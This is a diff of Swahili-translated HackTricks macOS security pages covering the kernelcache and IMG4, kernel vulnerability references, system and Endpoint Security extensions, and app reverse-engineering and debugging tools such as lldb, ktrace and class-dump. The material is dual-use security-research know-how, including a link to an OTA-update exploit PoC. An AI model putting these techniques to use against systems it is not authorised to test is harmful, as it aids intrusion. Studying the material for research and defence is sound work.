**Kernelcache** ni **toleo lililotayarishwa na kuunganishwa la kernel ya XNU**, pamoja na **madereva** muhimu na **nyongeza za kernel**. Inahifadhiwa katika muundo wa **kimecompressed** na inachukuliwa kwenye kumbukumbu wakati wa mchakato wa kuanzisha. Kernelcache inarahisisha **wakati wa kuanzisha haraka** kwa kuwa na toleo lililo tayari la kernel na madereva muhimu yanapatikana, kupunguza muda na rasilimali ambazo zingetumika kwa kupakia na kuunganisha vipengele hivi kwa wakati wa kuanzisha.
### Local Kerlnelcache
@ -58,12 +58,12 @@ Katika kesi yangu katika macOS niliipata katika:
#### IMG4
Muundo wa faili ya IMG4 ni muundo wa kontena unaotumiwa na Apple katika vifaa vyake vya iOS na macOS kwa ajili ya **kuhifadhi na kuthibitisha** vipengele vya firmware kwa usalama (kama **kernelcache**). Muundo wa IMG4 unajumuisha kichwa na lebo kadhaa ambazo zinafunga vipande tofauti vya data ikiwa ni pamoja na mzigo halisi (kama kernel au bootloader), saini, na seti ya mali za manifest. Muundo huu unasaidia uthibitishaji wa kificho, kuruhusu kifaa kuthibitisha ukweli na uadilifu wa kipengele cha firmware kabla ya kukitekeleza.
Muundo wa faili ya IMG4 ni muundo wa kontena unaotumiwa na Apple katika vifaa vyake vya iOS na macOS kwa ajili ya **kuhifadhi na kuthibitisha kwa usalama** vipengele vya firmware (kama **kernelcache**). Muundo wa IMG4 unajumuisha kichwa na lebo kadhaa ambazo zinafunga vipande tofauti vya data ikiwa ni pamoja na mzigo halisi (kama kernel au bootloader), saini, na seti ya mali za manifest. Muundo huu unasaidia uthibitisho wa kificho, ukiruhusu kifaa kuthibitisha ukweli na uadilifu wa kipengele cha firmware kabla ya kukitekeleza.
Kwa kawaida unajumuisha vipengele vifuatavyo:
- **Payload (IM4P)**:
- Mara nyingi inashinikizwa (LZFSE4, LZSS, …)
- Mara nyingi imekandamizwa (LZFSE4, LZSS, …)
- Inaweza kuwa na usimbuaji
- **Manifest (IM4M)**:
- Inajumuisha Saini
@ -85,7 +85,7 @@ pyimg4 im4p extract -i kernelcache.release.iphone14 -o kernelcache.release.iphon
- [**KernelDebugKit Github**](https://github.com/dortania/KdkSupportPkg/releases)
Katika [https://github.com/dortania/KdkSupportPkg/releases](https://github.com/dortania/KdkSupportPkg/releases) inawezekana kupata vifaa vyote vya ufuatiliaji wa kernel. Unaweza kuvipakua, kuvifunga, kuvifungua kwa kutumia chombo cha [Suspicious Package](https://www.mothersruin.com/software/SuspiciousPackage/get.html), kufikia folda ya **`.kext`** na **kuvitoa**.
Katika [https://github.com/dortania/KdkSupportPkg/releases](https://github.com/dortania/KdkSupportPkg/releases) inawezekana kupata vifaa vyote vya ufuatiliaji wa kernel. Unaweza kuvipakua, kuvifunga, kuvifungua kwa kutumia zana ya [Suspicious Package](https://www.mothersruin.com/software/SuspiciousPackage/get.html), kufikia folda ya **`.kext`** na **kuvitoa**.
Angalia kwa alama na:
```bash
@ -95,7 +95,7 @@ nm -a ~/Downloads/Sandbox.kext/Contents/MacOS/Sandbox | wc -l
Wakati mwingine Apple inatoa **kernelcache** pamoja na **symbols**. Unaweza kupakua firmware kadhaa zenye symbols kwa kufuata viungo kwenye kurasa hizo. Firmware zitakuwa na **kernelcache** pamoja na faili nyingine.
Ili **extract** faili, anza kwa kubadilisha kiendelezi kutoka `.ipsw` hadi `.zip` na **unzip**.
Ili **extract** faili, anza kwa kubadilisha kiambishi kutoka `.ipsw` hadi `.zip` na **unzip**.
Baada ya kutoa firmware utapata faili kama: **`kernelcache.release.iphone14`**. Iko katika muundo wa **IMG4**, unaweza kutoa taarifa muhimu kwa kutumia:
@ -126,7 +126,7 @@ kextex_all kernelcache.release.iphone14.e
# Check the extension for symbols
nm -a binaries/com.apple.security.sandbox | wc -l
```
## Urekebishaji
## Ukarabati
## Marejeleo

4
src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md
View File

@ -1,8 +1,8 @@
# Uthibitisho wa Kernel wa macOS
# macOS Kernel Vulnerabilities
{{#include ../../../banners/hacktricks-training.md}}
## [Kupata OTA](https://jhftss.github.io/The-Nightmare-of-Apple-OTA-Update/)
## [Pwning OTA](https://jhftss.github.io/The-Nightmare-of-Apple-OTA-Update/)
[**Katika ripoti hii**](https://jhftss.github.io/The-Nightmare-of-Apple-OTA-Update/) zinaelezewa udhaifu kadhaa ambao ziliruhusu kuathiri kernel kwa kuathiri mchakato wa sasisho la programu.\
[**PoC**](https://github.com/jhftss/POC/tree/main/CVE-2022-46722).

12
src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
View File

@ -12,14 +12,14 @@ Kuna aina tatu za system extensions: **DriverKit** Extensions, **Network** Exten
### **DriverKit Extensions**
DriverKit ni mbadala wa kernel extensions ambazo **zinatoa msaada wa vifaa**. Inaruhusu madereva ya vifaa (kama vile USB, Serial, NIC, na HID drivers) kufanya kazi katika nafasi ya mtumiaji badala ya nafasi ya kernel. Mfumo wa DriverKit unajumuisha **toleo la nafasi ya mtumiaji la baadhi ya madarasa ya I/O Kit**, na kernel inapeleka matukio ya kawaida ya I/O Kit kwa nafasi ya mtumiaji, ikitoa mazingira salama kwa madereva haya kufanya kazi.
DriverKit ni mbadala wa kernel extensions ambazo **zinatoa msaada wa vifaa**. Inaruhusu madereva ya vifaa (kama USB, Serial, NIC, na HID drivers) kufanya kazi katika nafasi ya mtumiaji badala ya nafasi ya kernel. Mfumo wa DriverKit unajumuisha **toleo la nafasi ya mtumiaji la baadhi ya madarasa ya I/O Kit**, na kernel inapeleka matukio ya kawaida ya I/O Kit kwa nafasi ya mtumiaji, ikitoa mazingira salama kwa madereva haya kufanya kazi.
### **Network Extensions**
Network Extensions zinatoa uwezo wa kubadilisha tabia za mtandao. Kuna aina kadhaa za Network Extensions:
- **App Proxy**: Hii inatumika kwa kuunda mteja wa VPN ambao unatekeleza itifaki ya VPN iliyobinafsishwa inayotegemea mtiririko. Hii inamaanisha inashughulikia trafiki ya mtandao kulingana na muunganisho (au mitiririko) badala ya pakiti za kibinafsi.
- **Packet Tunnel**: Hii inatumika kwa kuunda mteja wa VPN ambao unatekeleza itifaki ya VPN iliyobinafsishwa inayotegemea pakiti. Hii inamaanisha inashughulikia trafiki ya mtandao kulingana na pakiti za kibinafsi.
- **App Proxy**: Hii inatumika kwa kuunda mteja wa VPN ambao unatekeleza itifaki ya VPN iliyobinafsishwa inayotegemea mtiririko. Hii ina maana inashughulikia trafiki ya mtandao kulingana na muunganisho (au mitiririko) badala ya pakiti za kibinafsi.
- **Packet Tunnel**: Hii inatumika kwa kuunda mteja wa VPN ambaye anatekeleza itifaki ya VPN iliyobinafsishwa inayotegemea pakiti. Hii ina maana inashughulikia trafiki ya mtandao kulingana na pakiti za kibinafsi.
- **Filter Data**: Hii inatumika kwa kuchuja "mitiririko" ya mtandao. Inaweza kufuatilia au kubadilisha data za mtandao katika kiwango cha mtiririko.
- **Filter Packet**: Hii inatumika kwa kuchuja pakiti za mtandao za kibinafsi. Inaweza kufuatilia au kubadilisha data za mtandao katika kiwango cha pakiti.
- **DNS Proxy**: Hii inatumika kwa kuunda mtoa huduma wa DNS uliobinafsishwa. Inaweza kutumika kufuatilia au kubadilisha maombi na majibu ya DNS.
@ -32,7 +32,7 @@ Mfumo huu unatoa **mkusanyiko wa APIs za kufuatilia na kudhibiti shughuli za mfu
Msingi wa mfumo huu umewekwa katika kernel, kama Kernel Extension (KEXT) iliyoko **`/System/Library/Extensions/EndpointSecurity.kext`**. KEXT hii inajumuisha vipengele kadhaa muhimu:
- **EndpointSecurityDriver**: Hii inafanya kazi kama "nukta ya kuingia" kwa kiendelezi cha kernel. Ni nukta kuu ya mwingiliano kati ya OS na mfumo wa Endpoint Security.
- **EndpointSecurityDriver**: Hii inafanya kazi kama "nukta ya kuingia" kwa kiendelezi cha kernel. Ni sehemu kuu ya mwingiliano kati ya OS na mfumo wa Endpoint Security.
- **EndpointSecurityEventManager**: Kipengele hiki kinawajibika kwa kutekeleza nanga za kernel. Nanga za kernel zinaruhusu mfumo kufuatilia matukio ya mfumo kwa kukamata wito wa mfumo.
- **EndpointSecurityClientManager**: Hii inasimamia mawasiliano na wateja wa nafasi ya mtumiaji, ikifuatilia ni wateja gani wameunganishwa na wanahitaji kupokea arifa za matukio.
- **EndpointSecurityMessageManager**: Hii inatuma ujumbe na arifa za matukio kwa wateja wa nafasi ya mtumiaji.
@ -51,11 +51,11 @@ Matukio ambayo mfumo wa Endpoint Security unaweza kufuatilia yanagawanywa katika
**Mawasiliano ya nafasi ya mtumiaji** na mfumo wa Endpoint Security hufanyika kupitia darasa la IOUserClient. Aina mbili tofauti za subclasses zinatumika, kulingana na aina ya mpiga simu:
- **EndpointSecurityDriverClient**: Hii inahitaji ruhusa ya `com.apple.private.endpoint-security.manager`, ambayo inashikiliwa tu na mchakato wa mfumo `endpointsecurityd`.
- **EndpointSecurityExternalClient**: Hii inahitaji ruhusa ya `com.apple.developer.endpoint-security.client`. Hii kwa kawaida ingetumiwa na programu za usalama za wahusika wengine ambazo zinahitaji kuingiliana na mfumo wa Endpoint Security.
- **EndpointSecurityExternalClient**: Hii inahitaji ruhusa ya `com.apple.developer.endpoint-security.client`. Hii kwa kawaida ingekuwa ikitumika na programu za usalama za wahusika wengine ambazo zinahitaji kuingiliana na mfumo wa Endpoint Security.
The Endpoint Security Extensions:**`libEndpointSecurity.dylib`** ni maktaba ya C ambayo system extensions hutumia kuwasiliana na kernel. Maktaba hii inatumia I/O Kit (`IOKit`) kuwasiliana na KEXT ya Endpoint Security.
**`endpointsecurityd`** ni daemon muhimu wa mfumo unaohusika na kusimamia na kuzindua system extensions za usalama wa mwisho, hasa wakati wa mchakato wa kuanzisha mapema. **Ni system extensions tu** zilizo na **`NSEndpointSecurityEarlyBoot`** katika faili yao ya `Info.plist` zinazopokea matibabu haya ya kuanzisha mapema.
**`endpointsecurityd`** ni daemon muhimu wa mfumo unaohusika na kusimamia na kuzindua system extensions za usalama wa mwisho, hasa wakati wa mchakato wa kuanzisha mapema. **Ni system extensions tu** zilizoashiriwa na **`NSEndpointSecurityEarlyBoot`** katika faili yao ya `Info.plist` ndizo zinapata matibabu haya ya kuanzisha mapema.
Daemon nyingine ya mfumo, **`sysextd`**, **inasimamia system extensions** na kuhamasisha katika maeneo sahihi ya mfumo. Kisha inaomba daemon husika kupakia kiendelezi. **`SystemExtensions.framework`** inawajibika kwa kuanzisha na kuzima system extensions.

50
src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md
View File

@ -83,12 +83,12 @@ ldid -S/tmp/entl.xml <binary>
```
### SuspiciousPackage
[**SuspiciousPackage**](https://mothersruin.com/software/SuspiciousPackage/get.html) ni chombo muhimu kuchunguza **.pkg** faili (wawekaji) na kuona kilichomo ndani kabla ya kuisakinisha.\
[**SuspiciousPackage**](https://mothersruin.com/software/SuspiciousPackage/get.html) ni chombo muhimu cha kukagua **.pkg** faili (wawekaji) na kuona kilichomo ndani kabla ya kuisakinisha.\
Wawekaji hawa wana `preinstall` na `postinstall` bash scripts ambazo waandishi wa malware mara nyingi hutumia vibaya ili **kuendelea** **na** **malware**.
### hdiutil
Chombo hiki kinaruhusu **kuunganisha** picha za diski za Apple (**.dmg**) ili kuzichunguza kabla ya kuendesha chochote:
Chombo hiki kinaruhusu **kuunganisha** picha za diski za Apple (**.dmg**) ili kuzikagua kabla ya kuendesha chochote:
```bash
hdiutil attach ~/Downloads/Firefox\ 58.0.2.dmg
```
@ -98,7 +98,7 @@ Itakuwa imewekwa katika `/Volumes`
- Angalia kwa entropy ya juu
- Angalia nyuzi (kama hakuna nyuzi zinazoweza kueleweka, zimepakizwa)
- Packer ya UPX kwa MacOS inazalisha sehemu inayoitwa "\_\_XHDR"
- Packer wa UPX kwa MacOS huunda sehemu inayoitwa "\_\_XHDR"
## Uchambuzi wa Static Objective-C
@ -116,7 +116,7 @@ Kumbuka kwamba majina haya yanaweza kufichwa ili kufanya kurudi nyuma kwa binary
### Kuita kazi
Wakati kazi inaitwa katika binary inayotumia objective-C, msimbo uliokanzwa badala ya kuita kazi hiyo, itaita **`objc_msgSend`**. Ambayo itakuwa ikitafuta kazi ya mwisho:
Wakati kazi inaitwa katika binary inayotumia objective-C, msimbo ulioandikwa badala ya kuita kazi hiyo, utaita **`objc_msgSend`**. Ambayo itakuwa ikitafuta kazi ya mwisho:
![](<../../../images/image (305).png>)
@ -124,7 +124,7 @@ Paramu ambazo kazi hii inatarajia ni:
- Paramu ya kwanza (**self**) ni "kiashiria kinachopointia **mfano wa darasa ambalo linapaswa kupokea ujumbe**". Au kwa kusema kwa urahisi, ni kitu ambacho mbinu inaitwa juu yake. Ikiwa mbinu ni mbinu ya darasa, hii itakuwa mfano wa kitu cha darasa (kama jumla), wakati kwa mbinu ya mfano, self itapointia mfano ulioanzishwa wa darasa kama kitu.
- Paramu ya pili, (**op**), ni "mchaguzi wa mbinu inayoshughulikia ujumbe". Tena, kwa kusema kwa urahisi, hii ni tu **jina la mbinu.**
- Paramu zilizobaki ni **thamani zozote zinazohitajika na mbinu** (op).
- Paramus zilizobaki ni **thamani zozote zinazohitajika na mbinu** (op).
Tazama jinsi ya **kupata habari hii kwa urahisi na `lldb` katika ARM64** katika ukurasa huu:
@ -136,7 +136,7 @@ x64:
| **Hoja** | **Register** | **(kwa) objc_msgSend** |
| ---------------- | --------------------------------------------------------------- | ------------------------------------------------------ |
| **hoja ya 1** | **rdi** | **self: kitu ambacho mbinu inaitwa juu yake** |
| **hoja ya 1** | **rdi** | **self: kitu ambacho mbinu inaitwa juu yake** |
| **hoja ya 2** | **rsi** | **op: jina la mbinu** |
| **hoja ya 3** | **rdx** | **hoja ya 1 kwa mbinu** |
| **hoja ya 4** | **rcx** | **hoja ya 2 kwa mbinu** |
@ -144,15 +144,15 @@ x64:
| **hoja ya 6** | **r9** | **hoja ya 4 kwa mbinu** |
| **hoja ya 7+** | <p><strong>rsp+</strong><br><strong>(katika stack)</strong></p> | **hoja ya 5+ kwa mbinu** |
### Dump Metadata ya ObjectiveC
### Dump ObjectiveC metadata
### Dynadump
[**Dynadump**](https://github.com/DerekSelander/dynadump) ni chombo cha kutupa darasa la binaries za Objective-C. Github inataja dylibs lakini hii pia inafanya kazi na executable.
[**Dynadump**](https://github.com/DerekSelander/dynadump) ni chombo cha kutupa darasa la binaries za Objective-C. Github inaelezea dylibs lakini hii pia inafanya kazi na executable.
```bash
./dynadump dump /path/to/bin
```
Wakati wa uandishi, hii ni **sasa ndiyo inafanya kazi vizuri zaidi**.
Wakati wa uandishi, hii ni **sasa ndiyo inayo fanya kazi vizuri zaidi**.
#### Zana za kawaida
```bash
@ -162,9 +162,9 @@ objdump --macho --objc-meta-data /path/to/bin
```
#### class-dump
[**class-dump**](https://github.com/nygard/class-dump/) ni chombo cha asili kinachozalisha matamko ya madarasa, makundi na itifaki katika msimbo wa muundo wa ObjetiveC.
[**class-dump**](https://github.com/nygard/class-dump/) ni chombo cha asili kinachozalisha matamko ya madarasa, makundi na itifaki katika msimbo wa ObjectiveC.
Ni ya zamani na haina matengenezo hivyo huenda isifanye kazi vizuri.
Ni cha zamani na hakijatunzwa hivyo huenda hakiwezi kufanya kazi vizuri.
#### ICDump
@ -213,7 +213,7 @@ swift demangle
macOS inatoa APIs kadhaa za kuvutia ambazo zinatoa habari kuhusu michakato:
- `proc_info`: Hii ndiyo muhimu zaidi inayoleta habari nyingi kuhusu kila mchakato. Unahitaji kuwa root ili kupata habari za michakato mingine lakini huhitaji ruhusa maalum au mach ports.
- `proc_info`: Hii ndiyo muhimu zaidi inayoleta habari nyingi kuhusu kila mchakato. Unahitaji kuwa root ili kupata habari za michakato mingine lakini huwezi kuhitaji ruhusa maalum au mach ports.
- `libsysmon.dylib`: Inaruhusu kupata habari kuhusu michakato kupitia kazi zilizofichwa za XPC, hata hivyo, inahitajika kuwa na ruhusa `com.apple.sysmond.client`.
### Stackshot & microstackshots
@ -224,7 +224,7 @@ macOS inatoa APIs kadhaa za kuvutia ambazo zinatoa habari kuhusu michakato:
Zana hii (`/usr/bini/ysdiagnose`) kimsingi inakusanya habari nyingi kutoka kwa kompyuta yako ikitekeleza amri tofauti kama `ps`, `zprint`...
Inapaswa kufanywa kama **root** na daemon `/usr/libexec/sysdiagnosed` ina ruhusa za kuvutia kama `com.apple.system-task-ports` na `get-task-allow`.
Inapaswa kuendeshwa kama **root** na daemon `/usr/libexec/sysdiagnosed` ina ruhusa za kuvutia kama `com.apple.system-task-ports` na `get-task-allow`.
Plist yake iko katika `/System/Library/LaunchDaemons/com.apple.sysdiagnose.plist` ambayo inatangaza MachServices 3:
@ -236,7 +236,7 @@ Plist yake iko katika `/System/Library/LaunchDaemons/com.apple.sysdiagnose.plist
MacOS inazalisha magogo mengi ambayo yanaweza kuwa ya manufaa wakati wa kuendesha programu ikijaribu kuelewa **kila inafanya**.
Zaidi ya hayo, kuna baadhi ya magogo ambayo yatakuwa na lebo `<private>` ili **kuficha** baadhi ya **mtumiaji** au **kompyuta** **inayoweza kutambulika** habari. Hata hivyo, inawezekana **kusanidi cheti kufichua habari hii**. Fuata maelezo kutoka [**hapa**](https://superuser.com/questions/1532031/how-to-show-private-data-in-macos-unified-log).
Zaidi ya hayo, kuna baadhi ya magogo ambayo yatakuwa na lebo `<private>` ili **kuficha** baadhi ya **mtumiaji** au **kompyuta** **inayoweza kutambulika** habari. Hata hivyo, inawezekana **kufunga cheti kufichua habari hii**. Fuata maelezo kutoka [**hapa**](https://superuser.com/questions/1532031/how-to-show-private-data-in-macos-unified-log).
### Hopper
@ -343,7 +343,7 @@ Ni kituo cha kufuatilia kernel. M codes zilizoorodheshwa zinaweza kupatikana kat
Zana kama `latency`, `sc_usage`, `fs_usage` na `trace` zinatumia ndani yake.
Ili kuingiliana na `kdebug`, `sysctl` inatumika juu ya nafasi ya jina `kern.kdebug` na MIBs zinazoweza kutumika zinaweza kupatikana katika `sys/sysctl.h` zikiwa na kazi zilizotekelezwa katika `bsd/kern/kdebug.c`.
Ili kuingiliana na `kdebug`, `sysctl` inatumika juu ya nafasi ya `kern.kdebug` na MIBs zinazoweza kutumika zinaweza kupatikana katika `sys/sysctl.h` zikiwa na kazi zilizotekelezwa katika `bsd/kern/kdebug.c`.
Ili kuingiliana na kdebug na mteja maalum, hatua hizi kawaida hufuatwa:
@ -351,19 +351,19 @@ Ili kuingiliana na kdebug na mteja maalum, hatua hizi kawaida hufuatwa:
- Weka trace kwa KERN_KDSETBUF na KERN_KDSETUP
- Tumia KERN_KDGETBUF kupata idadi ya entries za buffer
- Pata mteja wako kutoka kwenye trace kwa KERN_KDPINDEX
- Washa kufuatilia kwa KERN_KDENABLE
- Wezesha kufuatilia kwa KERN_KDENABLE
- Soma buffer kwa kuita KERN_KDREADTR
- Ili kulinganisha kila thread na mchakato wake, piga KERN_KDTHRMAP.
Ili kupata habari hii, inawezekana kutumia zana ya Apple **`trace`** au zana maalum [kDebugView (kdv)](https://newosxbook.com/tools/kdv.html)**.**
**Kumbuka kwamba Kdebug inapatikana kwa mteja 1 tu kwa wakati mmoja.** Hivyo, zana moja iliyo na k-debug inaweza kutekelezwa kwa wakati mmoja.
**Kumbuka kwamba Kdebug inapatikana kwa mteja 1 tu kwa wakati mmoja.** Hivyo zana moja iliyo na k-debug inaweza kutekelezwa kwa wakati mmoja.
### ktrace
APIs za `ktrace_*` zinatoka `libktrace.dylib` ambazo zinafungua zile za `Kdebug`. Kisha, mteja anaweza tu kuita `ktrace_session_create` na `ktrace_events_[single/class]` kuweka callbacks kwenye codes maalum na kisha kuanza nayo kwa `ktrace_start`.
APIs za `ktrace_*` zinatoka `libktrace.dylib` ambazo zinafungwa zile za `Kdebug`. Kisha, mteja anaweza tu kuita `ktrace_session_create` na `ktrace_events_[single/class]` kuweka callbacks kwenye codes maalum na kisha kuanza nayo kwa `ktrace_start`.
Unaweza kutumia hii hata na **SIP imewashwa**
Unaweza kuitumia hata na **SIP imewezeshwa**
Unaweza kutumia kama wateja zana `ktrace`:
```bash
@ -415,12 +415,12 @@ fs_usage -w -f network curl #This tracks network actions
```
### TaskExplorer
[**Taskexplorer**](https://objective-see.com/products/taskexplorer.html) ni muhimu kuona **maktaba** zinazotumiwa na binary, **faili** inazotumia na **michakato** ya mtandao.\
[**Taskexplorer**](https://objective-see.com/products/taskexplorer.html) ni muhimu kuona **maktaba** zinazotumiwa na binary, **faili** inazotumia na **michango** ya mtandao.\
Pia inakagua michakato ya binary dhidi ya **virustotal** na kuonyesha taarifa kuhusu binary.
## PT_DENY_ATTACH <a href="#page-title" id="page-title"></a>
Katika [**hiki kipande cha blog**](https://knight.sc/debugging/2019/06/03/debugging-apple-binaries-that-use-pt-deny-attach.html) unaweza kupata mfano wa jinsi ya **kudebug daemon inayotembea** ambayo ilitumia **`PT_DENY_ATTACH`** kuzuia debugging hata kama SIP ilikuwa imezimwa.
Katika [**hiki blogu**](https://knight.sc/debugging/2019/06/03/debugging-apple-binaries-that-use-pt-deny-attach.html) unaweza kupata mfano kuhusu jinsi ya **kudebug daemon inayotembea** ambayo ilitumia **`PT_DENY_ATTACH`** kuzuia debugging hata kama SIP ilikuwa imezimwa.
### lldb
@ -438,7 +438,7 @@ settings set target.x86-disassembly-flavor intel
> [!WARNING]
> Ndani ya lldb, dump mchakato kwa `process save-core`
<table data-header-hidden><thead><tr><th width="225"></th><th></th></tr></thead><tbody><tr><td><strong>(lldb) Amri</strong></td><td><strong>Maelezo</strong></td></tr><tr><td><strong>run (r)</strong></td><td>Kuanza utekelezaji, ambayo itaendelea bila kukatizwa hadi breakpoint ipatikane au mchakato uishe.</td></tr><tr><td><strong>process launch --stop-at-entry</strong></td><td>Kuanza utekelezaji ukisimama kwenye kiingilio</td></tr><tr><td><strong>continue (c)</strong></td><td>Endelea na utekelezaji wa mchakato unaoshughulikiwa.</td></tr><tr><td><strong>nexti (n / ni)</strong></td><td>Tekeleza amri inayofuata. Amri hii itakataa kupita kwenye wito wa kazi.</td></tr><tr><td><strong>stepi (s / si)</strong></td><td>Tekeleza amri inayofuata. Tofauti na amri ya nexti, amri hii itachambua wito wa kazi.</td></tr><tr><td><strong>finish (f)</strong></td><td>Tekeleza amri zilizobaki katika kazi ya sasa (“frame”) rudisha na simama.</td></tr><tr><td><strong>control + c</strong></td><td>Simamisha utekelezaji. Ikiwa mchakato umekuwa ukikimbia (r) au umeendelea (c), hii itasababisha mchakato kusimama ... popote ulipo.</td></tr><tr><td><strong>breakpoint (b)</strong></td><td><p><code>b main</code> #Kazi yoyote inayoitwa main</p><p><code>b &#x3C;binname>`main</code> #Kazi kuu ya bin</p><p><code>b set -n main --shlib &#x3C;lib_name></code> #Kazi kuu ya bin iliyoonyeshwa</p><p><code>breakpoint set -r '\[NSFileManager .*\]$'</code> #Njia yoyote ya NSFileManager</p><p><code>breakpoint set -r '\[NSFileManager contentsOfDirectoryAtPath:.*\]$'</code></p><p><code>break set -r . -s libobjc.A.dylib</code> # Vunjia katika kazi zote za maktaba hiyo</p><p><code>b -a 0x0000000100004bd9</code></p><p><code>br l</code> #Orodha ya breakpoint</p><p><code>br e/dis &#x3C;num></code> #Washa/Zima breakpoint</p><p>breakpoint delete &#x3C;num></p></td></tr><tr><td><strong>help</strong></td><td><p>help breakpoint #Pata msaada wa amri ya breakpoint</p><p>help memory write #Pata msaada wa kuandika kwenye kumbukumbu</p></td></tr><tr><td><strong>reg</strong></td><td><p>reg read</p><p>reg read $rax</p><p>reg read $rax --format &#x3C;<a href="https://lldb.llvm.org/use/variable.html#type-format">format</a>></p><p>reg write $rip 0x100035cc0</p></td></tr><tr><td><strong>x/s &#x3C;reg/memory address></strong></td><td>Onyesha kumbukumbu kama mfuatano wa mwisho.</td></tr><tr><td><strong>x/i &#x3C;reg/memory address></strong></td><td>Onyesha kumbukumbu kama amri ya mkusanyiko.</td></tr><tr><td><strong>x/b &#x3C;reg/memory address></strong></td><td>Onyesha kumbukumbu kama byte.</td></tr><tr><td><strong>print object (po)</strong></td><td><p>Hii itachapisha kitu kinachorejelewa na param</p><p>po $raw</p><p><code>{</code></p><p><code>dnsChanger = {</code></p><p><code>"affiliate" = "";</code></p><p><code>"blacklist_dns" = ();</code></p><p>Kumbuka kwamba nyingi za API za Objective-C za Apple au mbinu hurudisha vitu, na hivyo zinapaswa kuonyeshwa kupitia amri ya “print object” (po). Ikiwa po haitoi matokeo yenye maana tumia <code>x/b</code></p></td></tr><tr><td><strong>memory</strong></td><td>memory read 0x000....<br>memory read $x0+0xf2a<br>memory write 0x100600000 -s 4 0x41414141 #Andika AAAA katika anwani hiyo<br>memory write -f s $rip+0x11f+7 "AAAA" #Andika AAAA katika anwani</td></tr><tr><td><strong>disassembly</strong></td><td><p>dis #Disas kazi ya sasa</p><p>dis -n &#x3C;funcname> #Disas kazi</p><p>dis -n &#x3C;funcname> -b &#x3C;basename> #Disas kazi<br>dis -c 6 #Disas mistari 6<br>dis -c 0x100003764 -e 0x100003768 # Kutoka moja hadi nyingine<br>dis -p -c 4 # Anza katika anwani ya sasa ukichambua</p></td></tr><tr><td><strong>parray</strong></td><td>parray 3 (char **)$x1 # Angalia array ya vipengele 3 katika reg x1</td></tr><tr><td><strong>image dump sections</strong></td><td>Chapisha ramani ya kumbukumbu ya mchakato wa sasa</td></tr><tr><td><strong>image dump symtab &#x3C;library></strong></td><td><code>image dump symtab CoreNLP</code> #Pata anwani ya alama zote kutoka CoreNLP</td></tr></tbody></table>
<table data-header-hidden><thead><tr><th width="225"></th><th></th></tr></thead><tbody><tr><td><strong>(lldb) Amri</strong></td><td><strong>Maelezo</strong></td></tr><tr><td><strong>run (r)</strong></td><td>Kuanza utekelezaji, ambayo itaendelea bila kukatizwa hadi breakpoint ipatikane au mchakato uishe.</td></tr><tr><td><strong>process launch --stop-at-entry</strong></td><td>Kuanza utekelezaji ukisimama kwenye kiingilio</td></tr><tr><td><strong>continue (c)</strong></td><td>Endelea na utekelezaji wa mchakato unaoshughulikiwa.</td></tr><tr><td><strong>nexti (n / ni)</strong></td><td>Tekeleza amri inayofuata. Amri hii itakataa kupita kwenye wito wa kazi.</td></tr><tr><td><strong>stepi (s / si)</strong></td><td>Tekeleza amri inayofuata. Tofauti na amri ya nexti, amri hii itachambua wito wa kazi.</td></tr><tr><td><strong>finish (f)</strong></td><td>Tekeleza maagizo mengine katika kazi ya sasa (“frame”) rudisha na simama.</td></tr><tr><td><strong>control + c</strong></td><td>Simamisha utekelezaji. Ikiwa mchakato umekuwa ukikimbia (r) au umeendelea (c), hii itasababisha mchakato kusimama ... popote ulipo.</td></tr><tr><td><strong>breakpoint (b)</strong></td><td><p><code>b main</code> #Kazi yoyote inayoitwa main</p><p><code>b &#x3C;binname>`main</code> #Kazi kuu ya bin</p><p><code>b set -n main --shlib &#x3C;lib_name></code> #Kazi kuu ya bin iliyoonyeshwa</p><p><code>breakpoint set -r '\[NSFileManager .*\]$'</code> #Kila njia ya NSFileManager</p><p><code>breakpoint set -r '\[NSFileManager contentsOfDirectoryAtPath:.*\]$'</code></p><p><code>break set -r . -s libobjc.A.dylib</code> # Vunjia katika kazi zote za maktaba hiyo</p><p><code>b -a 0x0000000100004bd9</code></p><p><code>br l</code> #Orodha ya breakpoint</p><p><code>br e/dis &#x3C;num></code> #Washa/Zima breakpoint</p><p>breakpoint delete &#x3C;num></p></td></tr><tr><td><strong>help</strong></td><td><p>help breakpoint #Pata msaada wa amri ya breakpoint</p><p>help memory write #Pata msaada wa kuandika kwenye kumbukumbu</p></td></tr><tr><td><strong>reg</strong></td><td><p>reg read</p><p>reg read $rax</p><p>reg read $rax --format &#x3C;<a href="https://lldb.llvm.org/use/variable.html#type-format">format</a>></p><p>reg write $rip 0x100035cc0</p></td></tr><tr><td><strong>x/s &#x3C;reg/memory address></strong></td><td>Onyesha kumbukumbu kama mfuatano wa mwisho.</td></tr><tr><td><strong>x/i &#x3C;reg/memory address></strong></td><td>Onyesha kumbukumbu kama amri ya mkusanyiko.</td></tr><tr><td><strong>x/b &#x3C;reg/memory address></strong></td><td>Onyesha kumbukumbu kama byte.</td></tr><tr><td><strong>print object (po)</strong></td><td><p>Hii itachapisha kitu kinachorejelewa na param</p><p>po $raw</p><p><code>{</code></p><p><code>dnsChanger = {</code></p><p><code>"affiliate" = "";</code></p><p><code>"blacklist_dns" = ();</code></p><p>Kumbuka kwamba nyingi za API za Objective-C za Apple au mbinu hurudisha vitu, na hivyo zinapaswa kuonyeshwa kupitia amri ya “print object” (po). Ikiwa po haitoi matokeo yenye maana tumia <code>x/b</code></p></td></tr><tr><td><strong>memory</strong></td><td>memory read 0x000....<br>memory read $x0+0xf2a<br>memory write 0x100600000 -s 4 0x41414141 #Andika AAAA katika anwani hiyo<br>memory write -f s $rip+0x11f+7 "AAAA" #Andika AAAA katika anwani</td></tr><tr><td><strong>disassembly</strong></td><td><p>dis #Disas kazi ya sasa</p><p>dis -n &#x3C;funcname> #Disas kazi</p><p>dis -n &#x3C;funcname> -b &#x3C;basename> #Disas kazi<br>dis -c 6 #Disas mistari 6<br>dis -c 0x100003764 -e 0x100003768 # Kutoka moja hadi nyingine<br>dis -p -c 4 # Anza katika anwani ya sasa ukichambua</p></td></tr><tr><td><strong>parray</strong></td><td>parray 3 (char **)$x1 # Angalia array ya vipengele 3 katika reg x1</td></tr><tr><td><strong>image dump sections</strong></td><td>Chapisha ramani ya kumbukumbu ya mchakato wa sasa</td></tr><tr><td><strong>image dump symtab &#x3C;library></strong></td><td><code>image dump symtab CoreNLP</code> #Pata anwani ya alama zote kutoka CoreNLP</td></tr></tbody></table>
> [!NOTE]
